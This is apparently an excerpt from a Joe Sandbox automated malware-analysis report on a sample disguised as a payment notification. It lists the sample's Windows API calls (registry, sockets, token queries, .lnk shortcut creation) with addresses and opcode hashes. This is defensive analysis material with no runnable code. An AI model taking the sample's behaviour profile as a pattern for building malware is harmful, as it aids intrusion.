                                                                              • TerminateThread.KERNEL32(006F0074,000001F6), ref: 0095099B
                                                                              • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 009509A9
                                                                              • CloseHandle.KERNEL32(006F0074), ref: 009509B8
                                                                              • InterlockedExchange.KERNEL32(019A0CB0,000001F6), ref: 009509C8
                                                                              • LeaveCriticalSection.KERNEL32(019A0C90), ref: 009509CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
                                                                              • Instruction ID: 457a86b412d4248907f54e1a0d6081fe34ecf15e42338ca1c14c8f169d320dbd
                                                                              • Opcode Fuzzy Hash: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
                                                                              • Instruction Fuzzy Hash: BFF03C7345AA02FBD7415FA4EE8CBD6BB39FF41702F402029F206A08A5CB7494A5DF90
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 008E5D30
                                                                              • GetWindowRect.USER32(?,?), ref: 008E5D71
                                                                              • ScreenToClient.USER32(?,?), ref: 008E5D99
                                                                              • GetClientRect.USER32(?,?), ref: 008E5ED7
                                                                              • GetWindowRect.USER32(?,?), ref: 008E5EF8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$Screen
                                                                              • String ID:
                                                                              • API String ID: 1296646539-0
                                                                              • Opcode ID: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
                                                                              • Instruction ID: 87cb0efa76381a6e25c202ae2bc368f161c0389fdae34a9de208ed244c22318b
                                                                              • Opcode Fuzzy Hash: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
                                                                              • Instruction Fuzzy Hash: 51B18A79A1078ADBDB10CFA9C4807EEB7F1FF48314F14841AE8A9D7254DB30AA51DB50
                                                                              APIs
                                                                              • __allrem.LIBCMT ref: 009100BA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009100D6
                                                                              • __allrem.LIBCMT ref: 009100ED
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091010B
                                                                              • __allrem.LIBCMT ref: 00910122
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00910140
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 1992179935-0
                                                                              • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                              • Instruction ID: 7c64150170cccd4ed4189de3fe5c62580a5aa068b7a78526f9a2fdffcef3e5bf
                                                                              • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                              • Instruction Fuzzy Hash: 57811772B0070AAFE7209E28CC51BAB73E9EFC5360F24453AF551D66C1E7B5DA808750
                                                                              APIs
                                                                                • Part of subcall function 00963149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0096101C,00000000,?,?,00000000), ref: 00963195
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00961DC0
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00961DE1
                                                                              • WSAGetLastError.WSOCK32 ref: 00961DF2
                                                                              • inet_ntoa.WSOCK32(?), ref: 00961E8C
                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00961EDB
                                                                              • _strlen.LIBCMT ref: 00961F35
                                                                                • Part of subcall function 009439E8: _strlen.LIBCMT ref: 009439F2
                                                                                • Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,008FCF58,?,?,?), ref: 008E6DBA
                                                                                • Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,008FCF58,?,?,?), ref: 008E6DED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                              • String ID:
                                                                              • API String ID: 1923757996-0
                                                                              • Opcode ID: 87e0394d8f0534dcce910c662bc6bdb241eab6dfa8a26a8e27b42d25a8a4cc12
                                                                              • Instruction ID: 1345c9e1f11e3d1d2567840eac34472984cf60414d3d9d5f9c32a995597fa259
                                                                              • Opcode Fuzzy Hash: 87e0394d8f0534dcce910c662bc6bdb241eab6dfa8a26a8e27b42d25a8a4cc12
                                                                              • Instruction Fuzzy Hash: CAA1DE31604340AFC324DB24C891F2A7BA9FF85318F58895CF5569B2A2DB71ED46CB92
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009082D9,009082D9,?,?,?,0091644F,00000001,00000001,8BE85006), ref: 00916258
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0091644F,00000001,00000001,8BE85006,?,?,?), ref: 009162DE
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009163D8
                                                                              • __freea.LIBCMT ref: 009163E5
                                                                                • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                              • __freea.LIBCMT ref: 009163EE
                                                                              • __freea.LIBCMT ref: 00916413
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1414292761-0
                                                                              • Opcode ID: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
                                                                              • Instruction ID: d59937cd8795820d17efb63a7bd95e011a757d72e88c5ab40d8c6abb95f21a8b
                                                                              • Opcode Fuzzy Hash: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
                                                                              • Instruction Fuzzy Hash: CC51D072B0021AABDB258F64CD81FEF77AAEB84710F144629FC25D6180EB34DCC1D660
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BCCA
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BD25
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0096BD6A
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0096BD99
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096BDF3
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0096BDFF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                              • String ID:
                                                                              • API String ID: 1120388591-0
                                                                              • Opcode ID: fdbbfffd3a40994cb68253af38ba43ee0e7663b2e0ec826d4ba7e331e712582b
                                                                              • Instruction ID: eb385b119c77282dc5fd08a1f3564f189b4dbd7737631328b1810175ab06d253
                                                                              • Opcode Fuzzy Hash: fdbbfffd3a40994cb68253af38ba43ee0e7663b2e0ec826d4ba7e331e712582b
                                                                              • Instruction Fuzzy Hash: 2C81C571108241EFC714DF24C895E2ABBE9FF85308F14895CF5998B2A2DB31ED85CB92
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000035), ref: 0093F7B9
                                                                              • SysAllocString.OLEAUT32(00000001), ref: 0093F860
                                                                              • VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F889
                                                                              • VariantClear.OLEAUT32(0093FA64), ref: 0093F8AD
                                                                              • VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F8B1
                                                                              • VariantClear.OLEAUT32(?), ref: 0093F8BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                              • String ID:
                                                                              • API String ID: 3859894641-0
                                                                              • Opcode ID: ec60b6dcb43f48bb9746c19983233b4c8e20d0f512508c418b60082f83dc0695
                                                                              • Instruction ID: f77f793b7949d5ce79ea7c1bed083cf8a6ef8e93697ccec1d2727dea721222a3
                                                                              • Opcode Fuzzy Hash: ec60b6dcb43f48bb9746c19983233b4c8e20d0f512508c418b60082f83dc0695
                                                                              • Instruction Fuzzy Hash: D551B735D10314BBCF24AB65D8A5B29B3A9EF45310F245866F906DF292DB748C40CF57
                                                                              APIs
                                                                                • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 009594E5
                                                                              • _wcslen.LIBCMT ref: 00959506
                                                                              • _wcslen.LIBCMT ref: 0095952D
                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00959585
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$FileName$OpenSave
                                                                              • String ID: X
                                                                              • API String ID: 83654149-3081909835
                                                                              • Opcode ID: aec2f674666269b53cec18f277c42030baa66cbda86fc23fd65f44354c6d44e5
                                                                              • Instruction ID: d0da13c3cef5ed4a145fd7bb3d36c8534339a0a56cf8258cc69c17d3f6bc3def
                                                                              • Opcode Fuzzy Hash: aec2f674666269b53cec18f277c42030baa66cbda86fc23fd65f44354c6d44e5
                                                                              • Instruction Fuzzy Hash: E9E1B431508340DFD724DF2AC881A6AB7E4FF85314F14896DF9999B2A2EB31DD05CB92
                                                                              APIs
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              • BeginPaint.USER32(?,?,?), ref: 008F9241
                                                                              • GetWindowRect.USER32(?,?), ref: 008F92A5
                                                                              • ScreenToClient.USER32(?,?), ref: 008F92C2
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008F92D3
                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 008F9321
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009371EA
                                                                                • Part of subcall function 008F9339: BeginPath.GDI32(00000000), ref: 008F9357
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                              • String ID:
                                                                              • API String ID: 3050599898-0
                                                                              • Opcode ID: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
                                                                              • Instruction ID: e0541d7262a516236dae80a99eeddea3a21cd3b256dc53b04c8cb829e7b05b4e
                                                                              • Opcode Fuzzy Hash: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
                                                                              • Instruction Fuzzy Hash: 1941B071118305AFD721DF64DCD4FBA7BA8FB55324F140229FAA8C72A1C7319885EB62
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0095080C
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00950847
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00950863
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 009508DC
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009508F3
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00950921
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3368777196-0
                                                                              • Opcode ID: 30be7dcd5d2f6aa85e116d938f3f5a4626960da3c9e466a32f1b9298f7ce152e
                                                                              • Instruction ID: b28a9064e09458fa08cdd7fc83f6d573c741a82804dd8ffa3743faa6134aaa4c
                                                                              • Opcode Fuzzy Hash: 30be7dcd5d2f6aa85e116d938f3f5a4626960da3c9e466a32f1b9298f7ce152e
                                                                              • Instruction Fuzzy Hash: 01414871900209EBDF14EF65DC85A6A77B8FF44310F1440A9EE04AE29BDB31DE65DBA0
                                                                              APIs
                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0093F3AB,00000000,?,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0097824C
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00978272
                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009782D1
                                                                              • ShowWindow.USER32(00000000,00000004), ref: 009782E5
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0097830B
                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0097832F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
                                                                              • Instruction ID: 7daa732f0f0306f6e8048fc7f18a2287592316d0a2f2f82f67b03b8ba4a68454
                                                                              • Opcode Fuzzy Hash: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
                                                                              • Instruction Fuzzy Hash: 0741F332645640EFDB25CF14D99DBE57BE4FB4A755F1882A8E61C4B2A3CB31A841CB40
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00944C95
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00944CB2
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00944CEA
                                                                              • _wcslen.LIBCMT ref: 00944D08
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00944D10
                                                                              • _wcsstr.LIBVCRUNTIME ref: 00944D1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 72514467-0
                                                                              • Opcode ID: 2dab0ec79f85d9052673667429e741404a8a11ab2774125aa57657154ffdccaa
                                                                              • Instruction ID: 8e6743aa966f1dbb0846aace8106a7fbc22d5946fc88eed80f997b54b254e7ce
                                                                              • Opcode Fuzzy Hash: 2dab0ec79f85d9052673667429e741404a8a11ab2774125aa57657154ffdccaa
                                                                              • Instruction Fuzzy Hash: F5213872604205BBEB255B39EC89F7B7B9CDF45750F10803DF909CE1D2EA61DC4096A0
                                                                              APIs
                                                                                • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                              • _wcslen.LIBCMT ref: 0095587B
                                                                              • CoInitialize.OLE32(00000000), ref: 00955995
                                                                              • CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 009559AE
                                                                              • CoUninitialize.OLE32 ref: 009559CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 3172280962-24824748
                                                                              • Opcode ID: 28dbd566c5afe838d2931b901cdff4859f2ce895f7dea536146e35de4d1931de
                                                                              • Instruction ID: a0396ab07ebaacba3068231b0b3205e318ed0e942386bfba970e812140da2b14
                                                                              • Opcode Fuzzy Hash: 28dbd566c5afe838d2931b901cdff4859f2ce895f7dea536146e35de4d1931de
                                                                              • Instruction Fuzzy Hash: C8D186716047019FC714DF1AC4A4A2ABBE5FF8A711F15885DF8899B362CB31EC49CB92
                                                                              APIs
                                                                                • Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
                                                                                • Part of subcall function 00940FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
                                                                                • Part of subcall function 00940FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
                                                                                • Part of subcall function 00940FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
                                                                                • Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002
                                                                              • GetLengthSid.ADVAPI32(?,00000000,00941335), ref: 009417AE
                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009417BA
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 009417C1
                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 009417DA
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00941335), ref: 009417EE
                                                                              • HeapFree.KERNEL32(00000000), ref: 009417F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
